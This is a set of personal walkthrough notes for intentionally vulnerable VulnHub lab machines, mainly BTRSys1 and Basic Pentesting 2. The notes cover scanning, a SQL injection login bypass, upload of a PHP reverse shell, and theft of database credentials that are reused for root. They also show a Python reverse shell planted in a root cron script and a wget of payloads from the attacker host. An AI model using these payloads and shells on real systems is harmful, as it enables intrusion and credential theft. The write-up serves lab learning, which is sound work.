Compile it on the attacker machine and download the binary instead. The target is x86_64, so the attacker's gcc output runs as long as the libc it links against is not newer than the target's; if in doubt, build with -static. chmod +x is enough, 777 is not needed.
$ wget 10.10.10.3/a.out
--2020-05-11 15:18:07-- http://10.10.10.3/a.out
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23776 (23K) [application/octet-stream]
Saving to: 'a.out'
0K .......... .......... ... 100% 68.2M=0s
2020-05-11 15:18:07 (68.2 MB/s) - 'a.out' saved [23776/23776]
$ chmod 777 a.out
$ ./a.out
bash: cannot set terminal process group (1374): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
Incidentally, the machine kernel-panicked shortly afterwards.
I wondered whether running it from a tty was the cause, but it is not: 41458 corrupts kernel heap memory (a DCCP double free), and a panic when the corruption lands badly is normal behaviour for that class of exploit. Run such exploits last, and never on a production host you cannot afford to reboot.
/usr/share/exploitdb/exploits/linux/local/44298.c also got root,
and that one did not panic.
Done.
vulnhub BTRSys1 notes
BTRSys1
Service enumeration
# nmap -p- 10.10.10.12
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 06:59 EDT
Nmap scan report for 10.10.10.12
Host is up (0.00031s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 18.49 seconds

# nmap -p21,22,80 -sV --version-all 10.10.10.12
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 07:01 EDT
Nmap scan report for 10.10.10.12
Host is up (0.00049s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds
Points of interest
- [port 21] ftp vsftpd 3.0.2
- [port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.7 (Ubuntu)
Details
[port 21] ftp vsftpd 3.0.2
# searchsploit vsftp
Exploit Title | Path (/usr/share/exploitdb/)
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
Shellcodes: No Result
Papers: No Result
vsftpd is unlikely to be the way in, now or in future boxes: everything listed is either a DoS or the 2.3.4 backdoor, and this is 3.0.2.
[port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
OpenSSH < 6.6 SFTP (x64) - Command Execution | exploits/linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution | exploits/linux/remote/45001.py
Those looked promising for a moment, but they need a valid SSH account restricted to SFTP; there is no SFTP-only setup in sight and no known user, so they do not apply.
[port 80] http Apache httpd 2.4.7 (Ubuntu)
# nikto -h 10.10.10.12
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.12
+ Target Hostname:    10.10.10.12
+ Target Port:        80
+ Start Time:         2020-05-08 07:37:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-08 07:38:28 (GMT-4) (75 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.12
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 9 02:08:34 2020
URL_BASE: http://10.10.10.12/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.12/ ----
==> DIRECTORY: http://10.10.10.12/assets/
+ http://10.10.10.12/index.php (CODE:200|SIZE:758)
==> DIRECTORY: http://10.10.10.12/javascript/
+ http://10.10.10.12/server-status (CODE:403|SIZE:291)
==> DIRECTORY: http://10.10.10.12/uploads/
---- Entering directory: http://10.10.10.12/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.12/javascript/ ----
==> DIRECTORY: http://10.10.10.12/javascript/jquery/
---- Entering directory: http://10.10.10.12/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.12/javascript/jquery/ ----
+ http://10.10.10.12/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://10.10.10.12/javascript/jquery/version (CODE:200|SIZE:5)
-----------------
END_TIME: Sat May 9 02:08:51 2020
DOWNLOADED: 13836 - FOUND: 4
Nothing against Apache or PHP themselves.
Plenty of directories, but nothing stands out.
Although /uploads/ is nothing but suspicious.
config.php cannot be read by simply requesting it: the server executes the PHP and returns an empty page, so the credentials nikto warns about stay hidden until we have a shell.
login.php does not look like it will let random guesses through.
However,
# curl 10.10.10.12/login.php
(snip)
<div class="login-box">
  <div class="lb-header">
    <a href="#" class="active" id="login-box-link">Giris Yap</a>
  </div>
  <form method="Post" name="loginform" action="personel.php" class="email-login">
    <div class="u-form-group">
      <input type="email" id="user" name="kullanici_adi" placeholder="Kullanici Adi" required/>
    </div>
    <div class="u-form-group">
      <input type="password" id="pwd" name="parola" placeholder="Parola" required/>
    </div>
    <div class="u-form-group">
      <input type="button" value="Giris" onclick="control();" />
    </div>
  </form>
</div>
<script type="text/javascript">
function control(){
  var user = document.getElementById("user").value;
  var pwd = document.getElementById("pwd").value;
  var str=user.substring(user.lastIndexOf("@")+1,user.length);
  if((pwd == "'")){
    alert("Hack Denemesi !!!");
  } else if (str!="btrisk.com"){
    alert("Yanlis Kullanici Bilgisi Denemektesiniz");
  } else{
    document.loginform.submit();
  }
}
</script>
Reading control(): the password is rejected only when it is exactly a single quote (pwd == "'"), not when it merely contains one,
and the e-mail is accepted only when the text after its last "@" is btrisk.com.
Satisfy those two conditions and the form submits whatever values you like; whether the login succeeds is decided server-side. Note that all of this runs in the browser, so it is a usability check, not a security control.
The page it submits to is
# curl 10.10.10.12/personel.php
(snip)
<script type="text/javascript">
// accept=".jpg,.png"
function getFile(){
  var filename = document.getElementById("dosya").value;
  var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined);
  if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){
    document.myform.submit();
  }else{
    //mesaj
    alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz.");
    return false;
  }
}
</script>
There is a file-upload script here?
But no button or form that triggers it is visible (curl without a session only shows the script, not the form).
Back to login.php.
After trying various logins: a single quote works as long as it sits in front of @btrisk.com. That follows from control() above: the quote check only looks at the password field, and the e-mail field is only checked for the domain after the last "@". Calling document.loginform.submit() from JavaScript also skips the browser's type="email" validation.
An e-mail of ' or '1'='1'-- @btrisk.com got the SQL injection through.
Once the SQLi landed I was logged in, and the getFile() upload button appeared.
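The login bypass above, modelled in Python with sqlite3 as an added example (this is not code from the original write-up or from the BTRSys1 application). The real query lives in sorgu.php, which the page never shows, so the WHERE clause below is an assumed shape; the table and column names come from the deneme.user dump later in the write-up, and the row values are constructed. client_side_control() is a port of the control() function from login.php, so you can see why the payload passes the browser check and then what the same string does to a string-built query versus a parameterized one.

```python
"""Added example: the BTRSys1 login bypass against a sqlite3 model of the query."""
import sqlite3

# The value that got the author past login.php. Everything after "--" is a
# SQL comment, so the trailing ' AND Parola='...' of the query is discarded.
PAYLOAD_EMAIL = "' or '1'='1'-- @btrisk.com"


def client_side_control(user: str, pwd: str) -> bool:
    """Port of control() in login.php (browser-side, therefore advisory only).

    Blocks a password that is *exactly* a single quote, and an address whose
    text after the last '@' is not btrisk.com. Nothing else is inspected.
    """
    domain = user[user.rfind("@") + 1:]
    if pwd == "'":
        return False
    return domain == "btrisk.com"


def _db() -> sqlite3.Connection:
    """In-memory stand-in for the deneme database; rows are constructed."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (ID INTEGER, Kullanici_Adi TEXT, Parola TEXT)")
    con.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(1, "ikaya@btrisk.com", "constructed-pw-1"),
         (2, "cdmir@btrisk.com", "constructed-pw-2")],
    )
    return con


def login_vulnerable(email: str, password: str) -> list:
    """Assumed shape of sorgu.php: user input spliced straight into the SQL."""
    con = _db()
    sql = ("SELECT ID FROM user WHERE Kullanici_Adi='%s' AND Parola='%s'"
           % (email, password))
    return [row[0] for row in con.execute(sql)]


def login_parameterized(email: str, password: str) -> list:
    """Same query with bound parameters: the payload is just a literal string."""
    con = _db()
    sql = "SELECT ID FROM user WHERE Kullanici_Adi=? AND Parola=?"
    return [row[0] for row in con.execute(sql, (email, password))]


if __name__ == "__main__":
    print("browser check lets payload through:",
          client_side_control(PAYLOAD_EMAIL, "anything"))
    print("vulnerable query returns IDs:", login_vulnerable(PAYLOAD_EMAIL, "anything"))
    print("parameterized query returns IDs:", login_parameterized(PAYLOAD_EMAIL, "anything"))
```

With the string-built query the WHERE clause becomes Kullanici_Adi='' or '1'='1', which is true for every row, and the comment swallows the password check entirely; the parameterized version compares the whole payload as a literal address and matches nothing.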
The reverse-shell PHP is the usual pentestmonkey one, /usr/share/webshells/php/php-reverse-shell.php.
Trying to upload it is refused because the name does not end in jpg, gif or png.
But that image-only decision is made by JavaScript in the browser, not on the server, so tweaking getFile() in the browser console bypasses it.
In my case, after picking the file in the file chooser, I ran document.myform.submit(); from the browser console and the upload went through untouched.
So where does the uploaded file land?
In /uploads/, of course.
Sure enough, after the upload the file is listed there, and because Apache executes .php under the web root the upload is now a remote shell.
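The upload check that was bypassed above, reproduced in Python as an added example beside the server-side check the application should have had (this is not code from the original write-up or from BTRSys1). client_side_check() is a faithful port of getFile(); server_side_check() is what a hardened personel.php would do with the same file name plus the file bytes. File names and contents are constructed for the demo, and the magic-byte table is an assumption limited to the three types the page allows.

```python
"""Added example: the bypassed client-side upload filter next to a server-side one."""
import re

# Port of getFile() from personel.php: text after the last '.', allow jpg/gif/png.
# It runs in the attacker's own browser, so document.myform.submit() skips it.
def client_side_check(filename: str) -> bool:
    match = re.search(r"[^.]+$", filename) if "." in filename else None
    ext = match.group(0) if match else None
    return ext in ("jpg", "gif", "png")


# Leading bytes the server can verify no matter what name the client sent.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
}


def server_side_check(filename: str, content: bytes) -> bool:
    """What personel.php should do after the request arrives.

    - exactly one extension (rejects reverse.php.jpg style double extensions),
    - extension from an allowlist,
    - file content must start with that type's magic bytes.
    The stored name should additionally be server-generated and the upload
    directory served without PHP execution; those are deployment settings,
    not something this function can enforce.
    """
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    ext = parts[1]
    if ext not in MAGIC:
        return False
    return any(content.startswith(sig) for sig in MAGIC[ext])


if __name__ == "__main__":
    shell = b"<?php system($_GET['c']); ?>"          # constructed payload
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16        # constructed JPEG header
    for name, body in [("reverse.php", shell), ("reverse.php.jpg", shell),
                       ("photo.jpg", jpeg), ("photo.jpg", shell)]:
        print(name, "client:", client_side_check(name),
              "server:", server_side_check(name, body))
```

The point of the pair: the browser check can only ever be a hint, because the client controls both the JavaScript and the HTTP request. Only the check that runs after the bytes reach the server decides anything.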
shell getchu!
window 1
# nc -nlvp 443
window 2
# curl 10.10.10.12/uploads/reverse.php
window 1
Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
 19:00:23 up 11:28, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
On a side note, /javascript/ was Forbidden,
yet /javascript/jquery/jquery and /javascript/jquery/version returned 200. That is the Ubuntu javascript-common package: it aliases /javascript/ to /usr/share/javascript/ without directory indexing, so the directory gives 403 while the files inside are served (and MultiViews maps "jquery" to jquery.js). Harmless, but a reminder that a 403 on a directory says nothing about its contents.
after shell getchu
Using credentials found in the SQL database
First, read the config.php we could not fetch over HTTP earlier.
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@BTRsys1:/var/www/html$ cd /var/www/html/
www-data@BTRsys1:/var/www/html$ ls
assets gonder.php index.php personel.php uploads config.php hakkimizda.php login.php sorgu.php
www-data@BTRsys1:/var/www/html$ cat config.php
<?php
/////////////////////////////////////////////////////////////////////////////////////////
$con=mysqli_connect("localhost","root","toor","deneme");
if (mysqli_connect_errno())
{
echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();
}
/////////////////////////////////////////////////////////////////////////////////////////
?>
www-data@BTRsys1:/var/www/html$
The web app connects as the MySQL root user with password toor. Could this turn into system root through MySQL?
www-data@BTRsys1:/var/www/html$ mysql -u root -p
Enter password: toor
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 361
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)
(snip)
mysql> select sys_exec("id");
ERROR 1305 (42000): FUNCTION sys_exec does not exist
No such luck: sys_exec is a user-defined function from lib_mysqludf_sys and is not installed by default, so MySQL root alone does not execute commands here. Look around the data instead.
mysql> show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| deneme             |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
mysql> use information_schema;
Database changed
mysql> show tables;
(the 40 standard tables: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, ENGINES, EVENTS, FILES, GLOBAL_STATUS, GLOBAL_VARIABLES, KEY_COLUMN_USAGE, PARAMETERS, PARTITIONS, PLUGINS, PROCESSLIST, PROFILING, REFERENTIAL_CONSTRAINTS, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, SESSION_STATUS, SESSION_VARIABLES, STATISTICS, TABLES, TABLESPACES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, INNODB_BUFFER_PAGE, INNODB_TRX, INNODB_BUFFER_POOL_STATS, INNODB_LOCK_WAITS, INNODB_CMPMEM, INNODB_CMP, INNODB_LOCKS, INNODB_CMPMEM_RESET, INNODB_CMP_RESET, INNODB_BUFFER_PAGE_LRU)
40 rows in set (0.00 sec)
mysql> use deneme;
Database changed
mysql> show tables;
+------------------+
| Tables_in_deneme |
+------------------+
| user             |
+------------------+
1 row in set (0.00 sec)
mysql> select * from user;
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| ID | Ad_Soyad    | Kullanici_Adi    | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
|  1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   |            5 |
|  2 | can demir   | cdmir@btrisk.com | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  |            8 |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
2 rows in set (0.00 sec)
mysql>
Plaintext passwords in the application table; that looks reusable.
www-data@BTRsys1:/var/www/html$ su -
Password: asd123***
root@BTRsys1:~# id
uid=0(root) gid=0(root) groups=0(root)
root shell getchu!! (Plain password reuse: the application users' password is also the system root password.)
Looking at cron
I came across an interesting command, find / -perm -2 -type f 2>/dev/null (list every regular file whose "other" write bit is set, i.e. world-writable), so let's try it.
www-data@BTRsys1:/var/www/html$ find / -perm -2 -type f 2>/dev/null
/var/tmp/cleaner.py.swp
/var/log/cronlog
(snip)
/lib/log/cleaner.py
Most of the output is uninteresting, but two entries stand out.
What are /var/log/cronlog and /lib/log/cleaner.py?
www-data@BTRsys1:/var/www/html$ cat /var/log/cronlog
*/2 * * * * cleaner.py
www-data@BTRsys1:/var/www/html$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
www-data@BTRsys1:/var/www/html$ ls -al /lib/log/ | grep cleaner
-rwxrwxrwx 1 root root 96 Aug 13 2014 cleaner.py
The crontab is root's and cleaner.py is writable by everyone, so rewriting cleaner.py gives us root within two minutes.
This time I replace it with the following one-liner reverse shell, reformatted here for readability:
#!/usr/bin/env python
import socket, subprocess, os
# LHOST/LPORT: the attacker's listener. LPORT must be an integer, not a quoted string.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("LHOST", LPORT))
# point the child's stdin, stdout and stderr at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
Set LHOST and LPORT to taste.
attacker
# python -m SimpleHTTPServer 80

victim
www-data@BTRsys1:/var/www/html$ cd /lib/log
www-data@BTRsys1:/lib/log$ cd /tmp
www-data@BTRsys1:/tmp$ wget 10.10.10.3/getroot.py
--2020-05-09 20:03:17-- http://10.10.10.3/getroot.py
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 238 [text/plain]
Saving to: 'getroot.py'
100%[======================================>] 238 --.-K/s in 0s
2020-05-09 20:03:17 (47.3 MB/s) - 'getroot.py' saved [238/238]
www-data@BTRsys1:/tmp$ cp ./getroot.py /lib/log/cleaner.py
www-data@BTRsys1:/tmp$

attacker (waiting for cron)
# nc -nlvp 8080
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 10.10.10.12.
Ncat: Connection from 10.10.10.12:56889.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
Working under /tmp is risky here: the original cleaner.py runs rm -r /tmp/* every two minutes, so with bad timing the downloaded file is deleted before you copy it. Staging in /var/www/html/uploads (already writable by www-data) avoids that.
Lessons
- find / -perm -2 -type f 2>/dev/null is great, isn't it!?
vulnhub Basic Pentesting 2 notes
Basic pentesting 2
Extracting the archive produced an OVA, but importing it was not enough to bring the link up on the internal network.
This applies to my lab setup.
Choosing "recovery mode" at boot and then "network  Enable networking" brought the link up.
It has to be done again every time the VM is powered off and on.
Service enumeration
# nmap -Pn -p- 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT
Nmap scan report for 10.10.10.11
Host is up (0.00011s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 15.64 seconds

# nmap -Pn -p22,80,139,445,8009,8080 -sV --version-all 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT
Nmap scan report for 10.10.10.11
Host is up (0.00081s latency).
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds
Points of interest
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
- [port 139,445] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
- [port 8009] ajp13 Apache Jserv (Protocol v1.3)
- [port 8080] http Apache Tomcat 9.0.7
An Apache festival this time.
Details
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
I remember concluding before that this version offers nothing beyond username enumeration (the timing-based CVE-2016-6210 applies to 7.2p2), which needs candidate names to be useful.
Brute force is not smart, so skip it for now.
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.11
+ Target Hostname:    10.10.10.11
+ Target Port:        80
+ Start Time:         2020-05-04 23:48:50 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 9e, size: 56a870fbc8f28, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /development/: Directory indexing found.
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-04 23:49:15 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.11
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 4 23:49:46 2020
URL_BASE: http://10.10.10.11/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.11/ ----
==> DIRECTORY: http://10.10.10.11/development/
+ http://10.10.10.11/index.html (CODE:200|SIZE:158)
+ http://10.10.10.11/server-status (CODE:403|SIZE:299)
---- Entering directory: http://10.10.10.11/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon May 4 23:49:50 2020
DOWNLOADED: 4612 - FOUND: 2

# dirb http://10.10.10.11/development/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 4 23:50:03 2020
URL_BASE: http://10.10.10.11/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.11/development/ ----
-----------------
END_TIME: Mon May 4 23:50:07 2020
DOWNLOADED: 4612 - FOUND: 0
/development/ is suspicious.
# curl http://10.10.10.11
<html>
<h1>Undergoing maintenance</h1>
<h4>Please check back later</h4>
<!-- Check our dev note section if you need to know what to work on. -->
</html>
The /development/ listing contains dev.txt and j.txt.
# curl http://10.10.10.11/development/dev.txt
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

# curl http://10.10.10.11/development/j.txt
For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.

-K
Apache Struts?
Does "struts" mean Apache Struts?
If so, the box is running Apache Struts 2.5.12, with the REST showcase example deployed somewhere.
# searchsploit apache
(snip)
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution | exploits/linux/remote/42627.py
Exploit code exists, but no Struts application showed up on port 80 or 8080 during enumeration, so there is nothing to point it at yet. On hold.
So per K, J's password hash is weak?
I sensed a hint at directory traversal to /etc/shadow, but could not find one; the note simply says J's password is crackable.
[port 139,445] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
# smbclient -L 10.10.10.11
Enter WORKGROUP\root's password:

	Sharename       Type      Comment
	---------       ----      -------
	Anonymous       Disk
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
This Samba is "Samba Server 4.3.11-Ubuntu".
Come to think of it, smbclient -L had never worked for me before; pressing Enter at the password prompt attempts a null session, so the listing only succeeds when the server permits anonymous access, as this one does (hence the Anonymous share). -N skips the prompt entirely.
# enum4linux 10.10.10.11
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 5 00:25:23 2020
==========================
|  Target Information  |
==========================
Target ........... 10.10.10.11
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
(snip)
=====================================
|  OS information on 10.10.10.11  |
=====================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.11 from smbclient:
[+] Got OS info for 10.10.10.11 from srvinfo:
	BASIC2         Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03
(snip)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
============================================
|  Getting printer info for 10.10.10.11  |
============================================
No printers returned.
enum4linux complete on Tue May 5 00:25:38 2020
Login attempts as kay and jan (guessing passwords by hand) got nowhere. The two usernames are the real prize here, though: they turn the SSH "username enumeration only" situation into a password-guessing one.
hydra against SMB reported no valid user either.
The Samba exploits seem to need local access, so abandoned.
No idea.
[port 8009] ajp13 Apache Jserv (Protocol v1.3)
AJP is just Tomcat's connector for a front-end proxy, so rather than look at it directly, check Tomcat itself on 8080.
[port 8080] http Apache Tomcat 9.0.7
# nikto -h 10.10.10.11 -p 8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.11
+ Target Hostname:    10.10.10.11
+ Target Port:        8080
+ Start Time:         2020-05-05 00:49:02 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 8169 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2020-05-05 00:49:33 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.11:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue May 5 00:49:59 2020
URL_BASE: http://10.10.10.11:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.11:8080/ ----
+ http://10.10.10.11:8080/docs (CODE:302|SIZE:0)
